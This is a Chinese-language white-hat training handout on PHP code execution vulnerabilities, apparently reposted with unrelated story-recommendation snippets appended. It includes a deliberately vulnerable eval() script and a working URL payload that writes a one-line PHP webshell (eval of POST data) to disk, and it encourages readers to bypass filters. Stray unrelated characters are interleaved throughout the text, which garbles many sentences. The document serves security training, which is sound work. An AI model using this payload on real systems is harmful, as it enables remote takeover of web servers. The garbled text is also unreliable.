米斯特白帽培訓(xùn)講義 漏洞篇 代碼執(zhí)行

米斯特白帽培訓(xùn)講義 漏洞篇 代碼執(zhí)行

講師:gh0stkey

整理:飛龍

協(xié)議:CC BY-NC-SA 4.0

原理

由于開發(fā)人員編寫源碼時(shí)赌莺,沒有針對(duì)代碼中可執(zhí)行的特殊函數(shù)入口做過濾窍株,導(dǎo)致客戶端可以提交惡意構(gòu)造語句赖草,并交由服務(wù)端執(zhí)行瓦宜。命令注入攻擊中矫限,Web 服務(wù)器沒有過濾類似system法绵、evalexec等函數(shù)凭戴,是該漏洞攻擊成功的主要原因涧狮。

實(shí)例代碼

<?php
// code-exe.php:
$code=@$_GET['code'];//http://localhost/subject/code-exe.php?code=
echo "<center>Payload:".$code."<br/>Result:</center>
eval($code);

整個(gè)代碼就三行,第一行用于從 URL 參數(shù)中讀取code參數(shù)的值么夫。第二行用于輸出該參數(shù)的值者冤,用于檢查該參數(shù)。第三行直接將該參數(shù)當(dāng)做 PHP 代碼執(zhí)行档痪。由于不存在任何過濾涉枫,就會(huì)產(chǎn)生代碼執(zhí)行漏洞。

我們?cè)谠撐募哪夸浵聢?zhí)行php -S 0.0.0.0:80腐螟,之后訪問http://localhost/code-exe.php?code=phpinfo();愿汰,我們可以看到該代碼執(zhí)行了phpinfo函數(shù):

利用

我們可以將 URL 中code參數(shù)值換成不同的 PHP 代碼,使其執(zhí)行不同的 PHP 代碼乐纸。利用此漏洞的關(guān)鍵還是熟悉所有可用的 PHP 代碼衬廷。

比如,可以使用phpinfo或者echo等調(diào)試函數(shù)來判定漏洞汽绢。最重要的是吗跋,可以利用這個(gè)漏洞寫入 Webshell,代碼如下:

$file='mst.php'; // 一句話木馬的文件名
$person='<?php @eval($_POST[1]);?>'; // 一句話文件名的代碼
file_put_contents($file,$person, FILE_APPEND | LOCK_EX); // 當(dāng)key.php文件不存在會(huì)自動(dòng)創(chuàng)建,如果存在就會(huì)添加

我們需要把這三行代碼寫入 URL 中跌宛,得到的 URL 是這樣:http://localhost/code-exe.php?code=$file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file,$person, FILE_APPEND | LOCK_EX);酗宋。

訪問之后,當(dāng)前目錄就會(huì)多出一個(gè)mst.php秩冈,內(nèi)容為<?php @eval($_POST[1]);?>本缠,這個(gè)就是一句話木馬斥扛。由于不是講工具的章節(jié)入问,這里就不拿菜刀演示了。

在實(shí)際代碼中稀颁,當(dāng)然不可能這么短芬失,就需要大家使用evalexec作為關(guān)鍵詞來搜索可能的漏洞點(diǎn)。另外匾灶,實(shí)際代碼中還可能在執(zhí)行之前對(duì)$code進(jìn)行過濾棱烂,也需要大家發(fā)揮創(chuàng)造性,繞過過濾來成功利用它阶女。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末颊糜,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子秃踩,更是在濱河造成了極大的恐慌衬鱼,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,188評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件憔杨,死亡現(xiàn)場(chǎng)離奇詭異鸟赫,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)消别,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,464評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門抛蚤,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人寻狂,你說我怎么就攤上這事岁经。” “怎么了蛇券?”我有些...
    開封第一講書人閱讀 165,562評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵缀壤,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我怀读,道長(zhǎng)诉位,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,893評(píng)論 1 295
  • 正文 為了忘掉前任菜枷,我火速辦了婚禮苍糠,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘啤誊。我一直安慰自己岳瞭,他們只是感情好拥娄,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,917評(píng)論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著瞳筏,像睡著了一般稚瘾。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上姚炕,一...
    開封第一講書人閱讀 51,708評(píng)論 1 305
  • 那天摊欠,我揣著相機(jī)與錄音,去河邊找鬼柱宦。 笑死些椒,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的掸刊。 我是一名探鬼主播免糕,決...
    沈念sama閱讀 40,430評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼忧侧!你這毒婦竟也來了石窑?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,342評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤蚓炬,失蹤者是張志新(化名)和其女友劉穎松逊,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體试吁,經(jīng)...
    沈念sama閱讀 45,801評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡棺棵,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,976評(píng)論 3 337
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了熄捍。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片烛恤。...
    茶點(diǎn)故事閱讀 40,115評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖余耽,靈堂內(nèi)的尸體忽然破棺而出缚柏,到底是詐尸還是另有隱情,我是刑警寧澤碟贾,帶...
    沈念sama閱讀 35,804評(píng)論 5 346
  • 正文 年R本政府宣布币喧,位于F島的核電站,受9級(jí)特大地震影響袱耽,放射性物質(zhì)發(fā)生泄漏杀餐。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,458評(píng)論 3 331
  • 文/蒙蒙 一朱巨、第九天 我趴在偏房一處隱蔽的房頂上張望史翘。 院中可真熱鬧,春花似錦、人聲如沸琼讽。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,008評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽钻蹬。三九已至吼蚁,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間问欠,已是汗流浹背肝匆。 一陣腳步聲響...
    開封第一講書人閱讀 33,135評(píng)論 1 272
  • 我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留溅潜,地道東北人术唬。 一個(gè)月前我還...
    沈念sama閱讀 48,365評(píng)論 3 373
  • 正文 我出身青樓薪伏,卻偏偏與公主長(zhǎng)得像滚澜,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子嫁怀,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,055評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容